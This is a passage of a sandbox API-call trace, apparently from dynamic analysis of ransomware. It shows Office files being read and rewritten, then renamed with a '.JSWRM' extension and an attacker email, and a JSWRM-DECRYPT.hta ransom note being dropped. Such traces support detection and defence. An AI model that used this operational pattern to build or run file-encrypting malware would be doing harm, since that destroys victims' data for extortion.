ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8260, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="XLLEX.DLL", cAlternateFileName="")) returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2=".") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="..") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="...") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="windows") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="recovery") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="perflogs") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="documents and settings") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="system volume information") returned 1 [0122.766] lstrcmpiW (lpString1="XLLEX.DLL", lpString2="msocache") returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLLEX.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLLEX.DLL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLLEX.DLL", lpUsedDefaultChar=0x0) returned 9 [0122.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLLEX.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLLEX.DLL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLLEX.DLL", lpUsedDefaultChar=0x0) returned 9 [0122.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0122.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0122.766] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="XLMACRO.CHM", cAlternateFileName="")) returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2=".") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="..") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="...") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="windows") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="recovery") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="perflogs") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="documents and settings") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="$RECYCLE.BIN") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="system volume information") returned 1 [0122.766] lstrcmpiW (lpString1="XLMACRO.CHM", lpString2="msocache") returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0122.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLMACRO.CHM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLMACRO.CHM", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLMACRO.CHM", lpUsedDefaultChar=0x0) returned 11 [0122.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0122.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLMACRO.CHM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLMACRO.CHM", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLMACRO.CHM", lpUsedDefaultChar=0x0) returned 11 [0122.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0122.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0122.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XLMACRO.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlmacro.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.767] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11264) returned 1 [0122.767] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c00) returned 0x24e1d8 [0122.768] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x2c00, lpOverlapped=0x0) returned 1 [0122.770] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.770] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x2c00, lpOverlapped=0x0) returned 1 [0122.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.770] CloseHandle (hObject=0x238) returned 1 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0122.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0122.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XLMACRO.CHM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlmacro.chm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XLMACRO.CHM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlmacro.chm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.771] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefccf8e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefccf8e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2dc60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="XLSLICER.DLL", cAlternateFileName="")) returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2=".") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="..") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="...") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="windows") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="recovery") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="perflogs") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="documents and settings") returned 1 [0122.771] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.772] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="system volume information") returned 1 [0122.772] lstrcmpiW (lpString1="XLSLICER.DLL", lpString2="msocache") returned 1 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0122.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLSLICER.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLSLICER.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0122.772] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefccf8e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefccf8e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2dc60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="XLSLICER.DLL", cAlternateFileName="")) returned 0 [0122.772] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0122.772] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="1036", cAlternateFileName="")) returned 1 [0122.772] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="...") returned 1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="recovery") returned -1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="perflogs") returned -1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="documents and settings") returned -1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="$RECYCLE.BIN") returned 1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="system volume information") returned -1 [0122.772] lstrcmpiW (lpString1="1036", lpString2="msocache") returned -1 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0122.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bce0 [0122.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0122.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\jswrm-decrypt.hta")) returned 0xffffffff [0122.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0122.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0122.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24e1d8 [0122.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0122.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0122.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b8f8 [0122.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0122.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0122.774] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.774] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0122.775] CloseHandle (hObject=0x45c) returned 1 [0122.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0122.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0122.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0122.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0122.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0122.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0122.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b9c0 [0122.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0122.775] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\jswrm-decrypt.hta")) returned 0x20 [0122.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0122.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0122.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0122.776] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fd6e698, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName=".", cAlternateFileName="")) returned 0x232040 [0122.776] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.776] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fd6e698, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="..", cAlternateFileName="")) returned 1 [0122.776] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.776] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.776] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd6e698, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3fd6e698, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3fd6e698, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0122.776] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0122.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0122.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.777] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: 